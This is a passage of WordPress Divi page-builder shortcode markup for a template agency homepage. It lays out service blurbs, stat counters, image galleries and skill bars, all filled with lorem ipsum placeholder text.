button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" 